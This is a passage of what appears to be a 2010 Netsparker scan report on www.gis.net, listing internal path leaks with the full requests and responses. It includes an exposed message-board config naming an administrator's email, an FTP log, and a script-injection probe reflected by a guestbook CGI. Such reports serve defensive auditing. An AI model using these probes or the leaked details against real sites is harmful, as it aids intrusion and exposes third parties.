style="font-size: 10pt;">Call 617-558-0900 or Toll Free: 888-334-2529</b> </p> <p style="text-align: center;"> <a href="http://start.gis.net">Start Page</a> | <a href="http://astromail.gis.net">Webmail</a> | <a href="terms.html">Terms of Service</a> | <a href="contact.html">Contact</a> </p> <p style="font-size: 8pt; text-align: center; padding-bottom: 20px;"> Copyright &copy; 2006 Galaxy Internet Services Inc. </p> </div> </div> </div> </body></html>
[Possible] Internal Path Leakage (*nix)

3 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact; however, this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /~sotis/cgi-bin/crazywwwboard.conf

http://www.gis.net/~sotis/cgi-bin/crazywwwboard.conf

Identified Internal Path(s)

  • /home/nobreak/public_html/cwb-data
  • /usr/local/etc/httpd/htdocs/bible/cwb-data
  • /usr/lib/sendmail

Request

GET /~sotis/cgi-bin/crazywwwboard.conf HTTP/1.1
Referer: http://www.gis.net/~sotis/cgi-bin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:55:04 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 1999 20:55:27 GMT
ETag: "c084f-66a8-c6942dc0"
Accept-Ranges: bytes
Content-Length: 26280
Content-Type: text/plain


LicenseKey = public######################################################################## #### CrazyWWWBoard.conf Realtime Configuration File #### #### Official distribution site : http://cwb98.nobreak.com #### Technical contact : support@nobreak.com #### #### (c) Nobreak Technologies, Inc. ############################################################################ The file(CrazyWWWBoard.conf)is interpreted by CrazyWWWBoard and Cr-## azyAdmin.cgi and reflected into excution immediately.#### CrazyWWWBoard(CWB) has been modified to meet users's various reque-## sts for a long time. So we introduce a realtime reference file cal-## led 'realtime configuration', for easy and quick modification of C-## WB. So most of users do not need to edit source codes.#### This program needs various configurations, but We already setup th-## is file for most of users' environment. If you install CWB for the## first time, You had better modify only RealBasePath and HtmlBasePa-## th element for your environment and maintain all other setup as de-## fault.## If you are certified that all of CWB elements runs properly, modify## another elments as you want at that time.#### The file is interpreted by CWB with next rules.#### 1. Element options are interpreted as following example.## ex) Element Name = Value String#### 2. If first character is '#', that line is never interpreted.## (commentary)## ex) # comments#### 3. Element Name and Value String is interpreted by Case Sensitive.#### 4. Blanks before Element Name, left/right one of '=', one after Va-## lue string are ignored in element options.## ex) Element Name=Value String## Element Name = Value String## Element Name = Value String#### 5. 
When you declared same element names, the firt one have effect.#### In the file, lines which starts with '##' are explanations and '#'## are examples of using elements## ## CookieEnable = true <- interpreted Element## #CookieEnable = false <- the Element is commentary.#### So, Users will be able to modify most of setup by insert or remove## '#' in front of elements.################################################################################################################################################ [ProgramName]#### Software automatically detect when CrazyWWWBoard.cgi or CrazyAdmin-## .cgi is renamed. This element exist to obtain correct filename of## CrazyAdmin.cgi and CrazyWWWBoard.cgi. So, if you renamed CrazyWWWB-## oard.cgi, please, modify following file correctly.## ## However, We feel sad about renaming this file! We think that crazy## means a mania, so we named this software made with our enthusiasm## CrazyWWWBoard and CrazyAdmin. Using original file name will make us## happy.########################################################################ProgramName = CrazyWWWBoard.cgi######################################################################## [AdminName, AdminEmail]#### Please set Administrator's name and his E-mail address.## They will apply to default configuration after creating DB.########################################################################AdminName = Robert DrakeAdminEmail = rdrake@gis.net######################################################################## [RealBasePath, HtmlBasePath]#### CWB is modified to be installed CGI files and DataBase(DB) files u-## nder separate directories. Up to CWB 3.x version Data directory wa-## s designed to exist under the directory where CGI exists. However## this configuration has made problems such as broken icons according## to web server's setup. 
When users upgrade new version, they have to## move existing data to new data directory.#### So We designed CGI to be installed under CGI directory such as cgi-## bin, and the following Data into chidren directory of 'document ro-## ot' where normal HTML files reside. Of course same as 3.x version,## Data directory can reside under the CGI directory but as mentioned## above, we recommend installing CGI and Data separately.#### /.../cgi-bin/ -+- CrazyAdmin.cgi## +- CrazyAdmin.conf## +- CrazyWWWBoard.cgi## +- CrazyWWWBoard.conf#### /.../htdocs/.../cwb-data/ -+- data/## ------ +- icon/## | +- icon-type/## V +- logs/## or /public_html/ +- message/#### Owing to changing installation method, CGI demand method to find d-## irectory where data exist. These two elements provide system with## absolute path of cwb-data and HTML on the web.#### Name of data directory in our release is 'cwb-data'.## Above directory will be standard directory of data, icon## icon-type, logs, messanges and so on.#### RealBasePath means absolute system path of cwb-date directory.## It refers shown directory when you type pwd command under the cwb-## data directory on unix shell.#### ex) $ cd cwb-data## $ pwd## /home/nobreak/public_html/cwb-data#### RealBasePath = /home/nobreak/public_html/cwb-data#### HtmlBasePath is cwb-data's absoulte path that based on the Http Do-## cument Root.i.e. It appears as subtracting domain from cwb-data di-## rectory URL on the Web.#### ex) Internet URL -> http://cwb98.nobreak.com/~nobreak/cwb-data## ~~~~~~~~~~~~~~~~~~## HtmlBasePath -> /~nobreak/cwb-data########################################################################RealBasePath = /usr/local/etc/httpd/htdocs/bible/cwb-dataHtmlBasePath = /cwb-data######################################################################## [DefaultCharSet]#### User can specify CharSet of each DB to prevent broken character un-## der the multilanguage environment. i.e. CWB output following conte-## nts.#### <meta .... 
content="text/html; charset=CharSet">#### If you specify CharSet on the each DB's administrator screen it wi-## ll be used, but if leave blank DefaultCharSet will be used.#### When most of DB should be set to euc-kr, and only a few DB should## be set to x-sjis, this element will be very effective.#### This element play a roll of explaining to browser how to express c-## haracter set other than alphabet. To show multilanguage in one DB## is the roll of the browser.#### If DefaultCharSet and CharSet of DB are set to blank, output will ## be nothing.#### Another reason of using this is to use better font type. For examp-## le, when it is set to euc-kr, GULIM font type will be applied.#### In some Browsers, setting CharSet cause blinking screen.#### If you use different HTML Header, Tailer in each DB's administrator## screen, this function won't be effective. You must type into Header## and Tailer by yourself.#### It doesn't matter that you use without specifying this element und-## er the normal state.########################################################################DefaultCharSet =#DefaultCharSet = iso-8859-1#DefaultCharSet = euc-kr#DefaultCharSet = x-sjis######################################################################## [DefaultTitle]#### You can specify different Browser Titles in each DB(Webboard).## If you don't specify any Brower Title in DB, following DefaultTitle## will be used as Brower Title.########################################################################DefaultTitle = CrazyWWWBoard 98 Professional Edition II######################################################################## [AllowUpload, UploadSoftLimit, UploadHardLimit]#### CWB supports file uploading. This section, explains about elements## concerned with file uploading.#### AllowUpload element can forbid uploading file to any DB. This elem-## ent is useful when each DB's administrator is different. 
If this## element is set to false, file uploading is forbidden to even the DB## set to upload enable.#### UploadSoftLimit and UploadHardLimit element describe the uploading## limitation of each DB by Kbyte.#### UploadSoftLimit is a relative limitation. If the sum of uploaded f-## iles is greater than defined value, it only forbids uploading (User## can write article) and an attached file should be added.#### UploadHardLimit is a absolute limitation. The sum of uploaded fil-## es cannot greater than defined value in any cases. Even if a user## succeeds to write an article, uploading will be canceled if the sum## of an attached file and uploaded files is greater than the defined## value. If the sum of uploaded files is greater than the defined va-## lue (in the case of setting up UploadHardLimit later), writing an## article will be forbidden.#### Here is the difference between two elements.## When you use UploadSoftLimit, once uploading is allowed, an attach-## ed file will be added though the sum of an attached file and alrea-## dy uploaded files is greater than the defined value, while UploadH-## ardLimit forbid uploading that file.## Even if UploadSoftLimit is set to 1024KB, a file whose size is over## 3000KB can be added. 
So in most cases, UploadHardLimit will be used## to prevent this confusion.#### Therefore, UploadHardLimit is valid only if it equals to or is gre-## ater than UploadSoftLimit.#### ex) UploadSoftLimit = 1024## UploadHardLimit = 2048#### If defined value equals to 0, uploading will not be forbidden.#### sample) +-------------+---------------+## | MegaBytes | UploadLimit |## +-------------+---------------+## | 1 MB | 1024 |## | 2 MB | 2048 |## | 3 MB | 3072 |## | 5 MB | 5120 |## | 10 MB | 10240 |## | 20 MB | 20480 |## +-------------+---------------+########################################################################AllowUpload = true#AllowUpload = falseUploadSoftLimit = 0#UploadSoftLimit = 1024UploadHardLimit = 0#UploadHardLimit = 5120######################################################################## [DataDirectory, DataExtension]#### In this section, I will explain the directory where webboard DB is## saved and DB file extention.## DataDirectory must be specifed by relative path based on standard## RealBasePath. Default set value will be used, if you don't change## the value because cwb-data/data directory assigned in release pack-## age.#### CWB adopt GDBM as a DB engine, and GDBM use extention 'gdbm' gener-## ally. Let's follow the rule.#### Location where DB is saved will be## RealBasePath/DataDirectory/DB_NAME.DataExtension########################################################################DataDirectory = dataDataExtension = gdbm######################################################################## [StatDirectory, StatExtension]#### Both the directory 'StatDirectory' and 'StatExtension' for file ty-## pe should be mentioned so as to see statistic data on web board.## StatDirectory needs relative directory path based on standard Real-## BasePath. ## We reserve it under cwb-data/stat in released pakage.## ## If StatDirectory remains blank, statistic function will be disable.## It means users can't refer statistic data on web board. 
## Here is the actual path where statistic DB will be placed.## RealBasePath/StatDirectory/DB_NAME.StatExtension########################################################################StatDirectory = stat#StatDirectory =StatExtension = stat-gdbm######################################################################## [LogDirectory]#### Log is used for a access statistics and security of each DB.## LogDirectory must be specified and used relative path notaion based## on RealBasePath. Default set value will be used, if you don't chan-## ge the value because cwb-data/data directory assigned in release p-## ackage.#### If you don't want log, because of limited storage capacity, you can## set to blank character string as following. In this case CWB's sta-## tistics function doesn't collect data any more.## LogDirectory =#### Location where log is saved will be ## RealBasePath/LogDirectory/adm_access_log <- CrazyAdmin.cgi## adm_error_log <- CrazyAdmin.cgi#### error_log <- CrazyWWWBoard.cgi## access_log.DB_NAME <- CrazyWWWBoard.cgi## error_log.DB_NAME <- CrazyWWWBoard.cgi########################################################################LogDirectory = log#LogDirectory =######################################################################## [AllowDBhtml, HtmlHead, HtmlTail]#### Basically, CWB output character string such as following onto brow-## ser.#### --[CGI Output 1]-----------## <html>## <head>## <title>Browse Title</title>## <meta http-equiv="Content-Type" content="text/html;## charset=CharSet">## </head>## --[HtmlHead]-------------## <body ...>## ...## <center>## --[CGI Output 2]-----------## ...## ...## --[HtmlTail]-------------## </center>## ...## </body>## --[CGI Output 3]-----------## </html>#### File's content specified in HtmlHead and HtmlTail will be output.## We call this System Default HTML.## ## This is available when supporting most of DB with same interface.## However, if you want to specify different type to a few DB, You can## use options from 
the DB's administrator menu.#### When different Html used by DB, CGI Output 1, 3 as following won't## output. So, Users have to specify code of CGI Output 1, 3.#### --[DB HTML Header]-----------## <html>## <head>## ...## </head>## <body>## ...## <center>## --[CGI Output]-----------## ...## ...## --[DB HTML Tail]-------------## </center>## ...## </body>## </html>#### AllowDBhtml void HTML Header, Tailer functions of ## DB compulsively. If this is set to false, DBs which used exist## DB HTML function are changed to System Default HTML compulsively.#### Actual location of file is as following, if you don't change the## default value.## RealBasePath/HtmlHead## RealBasePath/HtmlTail########################################################################AllowDBhtml = true#AllowDBhtml = falseHtmlHead = message/htmlhead.htmlHtmlTail = message/htmltail.html######################################################################## [HiddenAdminLink, HiddenStatLink]#### This is used to hide Administrator access icon and statistics icon## which reside on the upper side of each DB. #### When you hide icon, you can access through CrazyAdmin.cgi or as fo-## llowing.## CrazyWWWBoard.cgi?db=DB_NAME&mode=admin## CrazyWWWBoard.cgi?db=DB_NAME&mode=stat########################################################################HiddenAdminLink = false#HiddenAdminLink = trueHiddenStatLink = false#HiddenStatLink = true######################################################################## [HiddenHelpLink, Help]#### HiddenHelpLink element is used to hide help icon from the ## screen. 
Help element is file's actual linked path.#### Help must be specified by relative path based on HtmlBasePath## and interpreted as following.## HtmlBasePath/Help########################################################################HiddenHelpLink = false#HiddenHelpLink = trueHelp = message/help-en.txt#Help = YOUR_OWN_HELP.html######################################################################## [AllowDBmail, MailHead, MailTail]#### MailHead and Mailtail describe relative path of file which contains## the contents of email header and tail, based on RealBasePath.#### You can send different messages by each DB, when you set up messages## on administration menu of each DBs.#### AllowDBmail determines allowing whether using email message or not.########################################################################AllowDBmail = true#AllowDBmail = falseMailHead = message/mailhead.txtMailTail = message/mailtail.txt######################################################################## [Sendmail, SendmailOptions]#### It specifies location of 'sendmail' that CWB uses to send email.########################################################################Sendmail = /usr/lib/sendmailSendmailOptions = -i -t######################################################################## [MailName, MailOrganization]#### It specifies the name which will be used on the From column, and## the organization name which will be used on the Organization column## in the Email.########################################################################MailName = Tech Support BoardMailOrganization = Galaxy Internet Services######################################################################## [PageLinkNum]#### This set the number of article of page link shown below the viewing## catalog screen.#### Total 1/15 Pages## [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] - [Next] [15]########################################################################PageLinkNum = 
10######################################################################## [TextFieldLength]#### It regulate size of original text of the list writing screen. 74 is## optimized value in the various browser.## You can modify this to meet purpose of webboard.########################################################################TextFieldLength = 74######################################################################## [ReSubject, ReText, ReLine]#### When relative sentence is written, specfied relative object senten-## ces are marked. This element specifies symbols to use in this case.#### [Original Text]## Name : Nobreak## Subject : Hi, this is test.## Text : Good!!!#### [Quoted Text]## Subject : Re: Hi, this is test.## Text : Nobreak wrote:## > Good!!!########################################################################ReSubject = Re:ReText = wrote:ReLine = >######################################################################## [CookieEnable]#### If CookieEnable set to true, when user write list, user's name ## and mail address is registered to user's browser. And these are re-## ferred automatically, when the user write next list.#### However, if it is multiuser environment such as college computer## lab this causes chaos because it can refer to old user's name and## address. In this case, you can void this function by set to Cookie-## Enable = false.#### CookieExpireDays is a number of day that set value is valid. 
30 da-## ys is appropriate in most cases.########################################################################CookieEnable = false#CookieEnable = falseCookieExpireDays = 30######################################################################## [Icon*]#### It specifies icons linked to each items and relative path based on## HtmlBasePath.########################################################################IconAdminTitle = icon/admintitle.gifIconAdmin = icon/admin.gifIconStat = icon/stat.gifIconHome = icon/home.gifIconBack = icon/back.gifIconHelp = icon/help.gifIconList = icon/list.gifIconReload = icon/reload.gifIconWrite = icon/write.gifIconModify = icon/modify.gifIconReply = icon/reply.gifIconDelete = icon/delete.gifIconUp = icon/up.gifIconDown = icon/down.gifIconBlank = icon/blank.gif##################################..
- /cgi-bin/gbook.cgi/~username/guestbook.html

http://www.gis.net/cgi-bin/gbook.cgi/~username/guestbook.html

Identified Internal Path(s)

/usr/local/etc/httpd/htdocs/~username/guestbook.html:

Request

POST /cgi-bin/gbook.cgi/~username/guestbook.html HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 23
Accept-Encoding: gzip, deflate

address=1&body=1&name=1

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:55:20 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html


<HTML><HEAD><TITLE>Post Results</TITLE></HEAD><BODY>Can't open file /usr/local/etc/httpd/htdocs/~username/guestbook.html: No such file or directory</BODY></HTML>
- /cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C/script%3E

http://www.gis.net/cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C..

Identified Internal Path(s)

/usr/local/etc/httpd/htdocs/~username/guestbook.html

Request

POST /cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Enetsparker(0x000E82)%3C/script%3E HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 24
Accept-Encoding: gzip, deflate

address=1&body=1&name=1&

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:02:55 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html


<HTML><HEAD><TITLE>Post Results</TITLE></HEAD><BODY>Can't open file /usr/local/etc/httpd/htdocs/~username/guestbook.html'"--><script>netsparker(0x000E82)</script>: No such file or directory</BODY></HTML>
[Possible] Internal Path Leakage (Windows)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact; however, this information can help an attacker either to identify other vulnerabilities or to exploit vulnerabilities that have already been identified.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this file path was actually the real file path of the target web server.
  • Error messages should be disabled.
  • Remove this kind of sensitive data from the output.

- /~sotis/cgi-bin/ws_ftp.log

http://www.gis.net/~sotis/cgi-bin/ws_ftp.log

Identified Internal Path(s)

  • C:\bible\cgi
  • C:\Barish\Underdog\bible\cgi
  • C:\Barish\Bibles\bible2\cgi
  • C:\bible2\cgi

Request

GET /~sotis/cgi-bin/ws_ftp.log HTTP/1.1
Referer: http://www.gis.net/~sotis/cgi-bin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:55:04 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 1999 20:55:27 GMT
ETag: "c0850-fc6-c6942dc0"
Accept-Ranges: bytes
Content-Length: 4038
Content-Type: text/plain


1999.09.20 19:03 B C:\bible\cgi-bin\CrazyAdmin.cgi <-- ftp.gis.net /export/home/m/mbarish/bible/cgi-bin CrazyAdmin.cgi
1999.09.20 19:03 B C:\bible\cgi-bin\CrazyAdmin.conf <-- ftp.gis.net /export/home/m/mbarish/bible/cgi-bin CrazyAdmin.conf
1999.09.20 19:03 B C:\bible\cgi-bin\CrazyWWWBoard.cgi <-- ftp.gis.net /export/home/m/mbarish/bible/cgi-bin CrazyWWWBoard.cgi
1999.09.20 19:03 B C:\bible\cgi-bin\CrazyWWWBoard.conf <-- ftp.gis.net /export/home/m/mbarish/bible/cgi-bin CrazyWWWBoard.conf
1999.09.20 20:47 B C:\bible\cgi-bin\WS_FTP.LOG --> ftp.gis.net /export/home/m/mbarish/bible/cgi-bin WS_FTP.LOG
1999.09.20 20:49 B C:\bible\cgi-bin\CrazyAdmin.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible/cgi-bin CrazyAdmin.cgi
1999.09.20 20:49 B C:\bible\cgi-bin\CrazyAdmin.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible/cgi-bin CrazyAdmin.conf
1999.09.20 20:49 B C:\bible\cgi-bin\CrazyWWWBoard.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible/cgi-bin CrazyWWWBoard.cgi
1999.09.20 20:49 B C:\bible\cgi-bin\CrazyWWWBoard.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible/cgi-bin CrazyWWWBoard.conf
1999.09.24 00:07 B C:\Barish\Underdog\bible\cgi-bin\WS_FTP.LOG <-- galaxy /export/home/m/mbarish/public_html/bible/cgi-bin WS_FTP.LOG
1999.09.28 00:29 B C:\Barish\Bibles\bible2\cgi-bin\crazyadmin.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.cgi
1999.09.28 00:29 B C:\Barish\Bibles\bible2\cgi-bin\crazyadmin.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.conf
1999.09.28 00:29 B C:\Barish\Bibles\bible2\cgi-bin\crazywwwboard.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.cgi
1999.09.28 00:29 B C:\Barish\Bibles\bible2\cgi-bin\crazywwwboard.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.conf
99.10.03 11:38 B C:\bible2\cgi-bin\ws_ftp.log <-- mbarish /export/home/m/mbarish/public_html/bible2/cgi-bin ws_ftp.log
99.10.03 16:21 B C:\bible2\cgi-bin\crazyadmin.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.cgi
99.10.03 16:21 B C:\bible2\cgi-bin\crazyadmin.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.conf
99.10.03 16:21 B C:\bible2\cgi-bin\crazywwwboard.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.cgi
99.10.03 16:21 B C:\bible2\cgi-bin\crazywwwboard.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.conf
99.10.03 16:21 B C:\bible2\cgi-bin\ws_ftp.log --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin ws_ftp.log
99.10.06 20:49 B C:\bible2\cgi-bin\crazyadmin.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.cgi
99.10.06 20:49 B C:\bible2\cgi-bin\crazyadmin.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.conf
99.10.06 20:49 B C:\bible2\cgi-bin\crazywwwboard.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.cgi
99.10.06 20:49 B C:\bible2\cgi-bin\crazywwwboard.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.conf
99.10.13 20:03 B C:\bible2\cgi-bin\ws_ftp.log <-- mbarish /export/home/m/mbarish/public_html/bible2/cgi-bin ws_ftp.log
99.10.16 11:51 B C:\bible2\cgi-bin\crazyadmin.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.cgi
99.10.16 11:51 B C:\bible2\cgi-bin\crazyadmin.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.conf
99.10.16 11:51 B C:\bible2\cgi-bin\crazywwwboard.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.cgi
99.10.16 11:51 B C:\bible2\cgi-bin\crazywwwboard.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.conf
1999.10.16 13:05 B C:\barish\projects\bibles\bibledone\cgi-bin\ws_ftp.log <-- galaxy /export/home/m/mbarish/public_html/bible2/cgi-bin ws_ftp.log